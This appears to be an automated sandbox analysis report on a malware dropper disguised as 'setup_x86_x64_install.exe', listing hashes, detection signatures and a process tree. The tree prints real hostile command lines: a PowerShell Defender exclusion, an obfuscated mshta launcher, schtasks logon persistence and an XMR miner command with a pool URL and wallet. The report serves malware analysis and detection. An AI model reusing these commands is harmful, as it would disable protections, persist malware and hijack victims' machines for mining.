Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
16s -
max time network
434s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
09-09-2021 22:16
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 904 2700 rundll32.exe 69 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1608 2700 rundll32.exe 69 -
Socelars Payload 1 IoCs
resource yara_rule behavioral3/files/0x00030000000130dc-103.dat family_socelars -
resource yara_rule behavioral3/files/0x00030000000130cf-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130cf-77.dat aspack_v212_v242 behavioral3/files/0x00040000000130ca-78.dat aspack_v212_v242 behavioral3/files/0x00040000000130ca-79.dat aspack_v212_v242 behavioral3/files/0x00030000000130d1-82.dat aspack_v212_v242 behavioral3/files/0x00030000000130d1-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 1376 setup_installer.exe 572 setup_install.exe -
Loads dropped DLL 21 IoCs
pid Process 1496 setup_x86_x64_install.exe 1376 setup_installer.exe 1376 setup_installer.exe 1376 setup_installer.exe 1376 setup_installer.exe 1376 setup_installer.exe 1376 setup_installer.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 572 setup_install.exe 112 cmd.exe 112 cmd.exe 1816 cmd.exe 944 cmd.exe 944 cmd.exe 1520 cmd.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 524 icacls.exe -
resource yara_rule behavioral3/memory/2472-224-0x0000000000370000-0x0000000000371000-memory.dmp themida behavioral3/memory/2836-232-0x0000000001030000-0x0000000001031000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 ip-api.com 116 api.2ip.ua 118 api.2ip.ua 135 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 3032 2604 WerFault.exe 70 2260 788 WerFault.exe 43 2380 2928 WerFault.exe 76 3236 2016 WerFault.exe 141 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2112 schtasks.exe 3004 schtasks.exe -
Kills process with taskkill 3 IoCs
pid Process 2440 taskkill.exe 868 taskkill.exe 1736 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2412 PING.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1496 wrote to memory of 1376 1496 setup_x86_x64_install.exe 26 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 1376 wrote to memory of 572 1376 setup_installer.exe 28 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 928 572 setup_install.exe 32 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 1816 572 setup_install.exe 33 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 112 572 setup_install.exe 34 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 1020 572 setup_install.exe 35 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 944 572 setup_install.exe 36 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 1092 572 setup_install.exe 37 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 620 572 setup_install.exe 38 PID 572 wrote to memory of 1520 572 setup_install.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Loads dropped DLL
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵PID:1488
-
C:\ProgramData\3492222.exe"C:\ProgramData\3492222.exe"6⤵PID:2284
-
-
C:\ProgramData\8305181.exe"C:\ProgramData\8305181.exe"6⤵PID:2336
-
-
C:\ProgramData\2816309.exe"C:\ProgramData\2816309.exe"6⤵PID:2592
-
-
C:\ProgramData\7923143.exe"C:\ProgramData\7923143.exe"6⤵PID:2472
-
-
C:\ProgramData\5501519.exe"C:\ProgramData\5501519.exe"6⤵PID:2836
-
-
C:\ProgramData\1557029.exe"C:\ProgramData\1557029.exe"6⤵PID:2884
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCRIPT: cLOsE(creatEoBjECT ( "wScRiPt.shELl"). RuN ("CMD /c TypE ""C:\ProgramData\1557029.exe"" > gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if """" =="""" for %B iN ( ""C:\ProgramData\1557029.exe"" ) do taskkill /Im ""%~NxB"" /F " ,0 , tRUe) )7⤵PID:1748
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c TypE "C:\ProgramData\1557029.exe"> gZ9~4qZ~O.EXE&& StarT GZ9~4QZ~O.EXe -P6_oIH__Ioj5q & if "" =="" for %B iN ( "C:\ProgramData\1557029.exe" ) do taskkill /Im "%~NxB" /F8⤵PID:2400
-
-
-
-
C:\ProgramData\8862437.exe"C:\ProgramData\8862437.exe"6⤵PID:2928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 18847⤵
- Program crash
PID:2380
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Loads dropped DLL
PID:112 -
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵PID:2236
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2452
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Loads dropped DLL
PID:944 -
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵PID:620
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
- Loads dropped DLL
PID:1520 -
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵PID:788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 788 -s 9646⤵
- Program crash
PID:2260
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵PID:1504
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu21df5caa1b78de6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21df5caa1b78de6.exe" & exit6⤵PID:2376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu21df5caa1b78de6.exe" /f7⤵
- Kills process with taskkill
PID:2440
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu214aaca5625.exeThu214aaca5625.exe5⤵PID:1604
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵PID:1544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu21568b0ab8.exeThu21568b0ab8.exe1⤵PID:1440
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵PID:2292
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵PID:2484
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵PID:2144
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
PID:2112
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵PID:2268
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵PID:2208
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Creates scheduled task(s)
PID:3004
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:2976
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵PID:2628
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵PID:2568
-
C:\ProgramData\7918417.exe"C:\ProgramData\7918417.exe"4⤵PID:1472
-
-
C:\ProgramData\7736599.exe"C:\ProgramData\7736599.exe"4⤵PID:2636
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵PID:1964
-
-
-
C:\ProgramData\1001399.exe"C:\ProgramData\1001399.exe"4⤵PID:2432
-
-
C:\ProgramData\4219765.exe"C:\ProgramData\4219765.exe"4⤵PID:2152
-
-
C:\ProgramData\2494671.exe"C:\ProgramData\2494671.exe"4⤵PID:2016
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 11565⤵
- Program crash
PID:3236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵PID:2652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit4⤵PID:1132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f5⤵
- Kills process with taskkill
PID:1736
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵PID:2604
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2604 -s 14884⤵
- Program crash
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵PID:744
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"3⤵PID:2744
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\is-V21RV.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-V21RV.tmp\setup_2.tmp" /SL5="$402A0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵PID:2200
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵PID:1008
-
C:\Users\Admin\AppData\Local\Temp\is-BC1G1.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-BC1G1.tmp\setup_2.tmp" /SL5="$602A0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵PID:2116
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵PID:2488
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe1⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\is-CV8VI.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-CV8VI.tmp\Thu214aaca5625.tmp" /SL5="$5012C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu214aaca5625.exe"1⤵PID:2132
-
C:\Users\Admin\AppData\Local\Temp\7zS065D5EB4\Thu2156de5489c19.exeThu2156de5489c19.exe1⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\tmp1EE6_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp1EE6_tmp.exe"2⤵PID:308
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv3⤵PID:2944
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:1556
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv5⤵PID:2732
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u5⤵PID:2408
-
-
C:\Windows\SysWOW64\PING.EXEping localhost5⤵
- Runs ping.exe
PID:2412
-
-
-
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe3⤵PID:2864
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:904 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1376
-
-
C:\Users\Admin\AppData\Local\Temp\3D8D.exeC:\Users\Admin\AppData\Local\Temp\3D8D.exe1⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\64EC.exeC:\Users\Admin\AppData\Local\Temp\64EC.exe1⤵PID:964
-
C:\Users\Admin\AppData\Local\Temp\64EC.exeC:\Users\Admin\AppData\Local\Temp\64EC.exe2⤵PID:1700
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\aae18372-d36e-4c7a-a708-5cd646af48fd" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:524
-
-
C:\Users\Admin\AppData\Local\Temp\64EC.exe"C:\Users\Admin\AppData\Local\Temp\64EC.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:2036
-
C:\Users\Admin\AppData\Local\Temp\64EC.exe"C:\Users\Admin\AppData\Local\Temp\64EC.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:1716
-
-
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:1664
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1608
-
C:\Users\Admin\AppData\Local\Temp\22AF.exeC:\Users\Admin\AppData\Local\Temp\22AF.exe1⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\F55A.exeC:\Users\Admin\AppData\Local\Temp\F55A.exe1⤵PID:1068